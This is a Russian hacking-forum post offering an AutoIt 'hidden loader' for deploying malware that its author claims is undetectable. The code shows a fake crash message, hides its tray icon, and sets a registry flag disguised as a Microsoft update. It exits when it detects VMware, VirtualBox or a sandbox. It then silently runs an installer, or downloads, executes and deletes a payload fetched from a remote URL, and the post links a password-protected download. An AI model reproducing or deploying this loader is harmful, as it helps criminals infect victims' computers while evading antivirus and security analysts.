Анти-Виртуалка, скрытый загрузчик на Autoit. (FUD)
Загрузка...

Анти-Виртуалка, скрытый загрузчик на Autoit. (FUD)

Тема в разделе "Прочее", создана пользователем RERCON, 29 июл 2017.

  1. RERCON

    RERCON Администратор
    Команда форума

    Регистрация:
    21 июл 2017
    Сообщения:
    469
    Статьи:
    18
    Симпатии:
    31
    В данной статье рассмотрим скрипт запрещающий установку вашего вЕруса на виртуальные машины , песочницы.
    Вдруг кто не знал, полезно будет.
    Особенности:
    При запуске выводится ошибка
    [​IMG]
    Запрет на повторный запуск
    Скрывает иконку в трее
    При определении виртуалки\песочницы вывод сообщения.
    Кстати, .exe будет FUD
    Сам код:

    Код:
    #NoTrayIcon ;Скрывает иконку в трее
    
    sleep (1500)
    MsgBox(16, "Application Error", "Ошибка при запуске приложения (0xc0000005). Для выхода из приложения нажмите кнопку ОК.") ;вывод фейк сообщения
    
    
    ;запрет на повторный запуск проверка через реестр
    
    $var = RegRead("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz")
    If $var = "1" Then RegWrite("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz", "REG_SZ", "0")
    $1 = Abs ($var+1)
    RegWrite("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz", "REG_SZ", $1)
    $var1 = RegRead("HKEY_CURRENT_USER\Software\Microsoft Appdates", "Microsoft updatezzzzzzzzz")
    If $var1 > "1" Then
       sleep (500)
       exit
      EndIf
    
    
    ;запрещает запуск на виртуальной машине
    
    ;AVWare - виртуалка
    If ProcessExists("VGAuthService.exe") Then
     MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
     sleep (50)
     exit
    EndIf
    
    ;VirtualBox - виртуалка
    If ProcessExists("VBoxService.exe") Then
     MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
     sleep (50)
     exit
    EndIf
    
    ;запрет на запуск в песочнице
    
    If _processuser(@AutoItPID) <> @UserName Then MsgBox(48, "Virtual environment", "Программа не работает на виртуальной машине")
       sleep (1000)
    If _processuser(@AutoItPID) <> @UserName Then Exit
    
    Func _processuser($ipid)
       Local Const $wbemflagreturnimmediately = 16
       Local Const $wbemflagforwardonly = 32
       Local $username = ""
       Local $objwmiservice = ObjGet("winmgmts://./root/cimv2")
       Local $colpid = $objwmiservice.execquery("Select * from Win32_Process Where ProcessID ='" & $ipid & "'", "WQL", $wbemflagreturnimmediately + $wbemflagforwardonly)
       For $objpid In $colpid
           If $objpid.processid = $ipid Then
               $objpid.getowner($username)
               ExitLoop
           EndIf
       Next
       Return $username
    EndFunc
    
    ShellExecuteWait(@ScriptDir & "\install.bat", "", @SW_HIDE)
    
    последняя строка - запуск инсталера в формате .bat . Если у вас инсталер в формате .exe то переименуйте соответственно.

    Либо используйте загрузку собраного вируса с FTP(код писать вместо последней строки кода выше)

    Код:
    Sleep(0)
    dl("http:\\site\file.exe", "file.exe")
    If FileExists(@UserProfileDir & "\" & "file.exe") Then
     ShellExecute (@UserProfileDir & "\" & "file.exe")
    EndIf
    
    Func dl($url, $file)
       $ohttp = ObjCreate("winhttp.winhttprequest.5.1")
       $ohttp.open("GET", $url)
       $ohttp.send()
       $htmlsource = $ohttp.responsebody
       FileOpen(@UserProfileDir  & "\" & $file, 16)
       FileWrite(@UserProfileDir  & "\" & $file, $htmlsource)
       FileClose(@UserProfileDir  & "\" & $file)
    EndFunc
    
     Sleep (10000)
       FileDelete(@UserProfileDir & "\" & "file.exe")
    
    Где меняем http:\\site\file.exe на ссылку с вашим стабом

    скачать
    Вы должны быть зарегистрированы для просмотра ссылок
    pass rat-club.su
    Скан архива что БЕЗ ПАРОЛЯ Вы должны быть зарегистрированы для просмотра ссылок

    Скан собраного exe
    Вы должны быть зарегистрированы для просмотра ссылок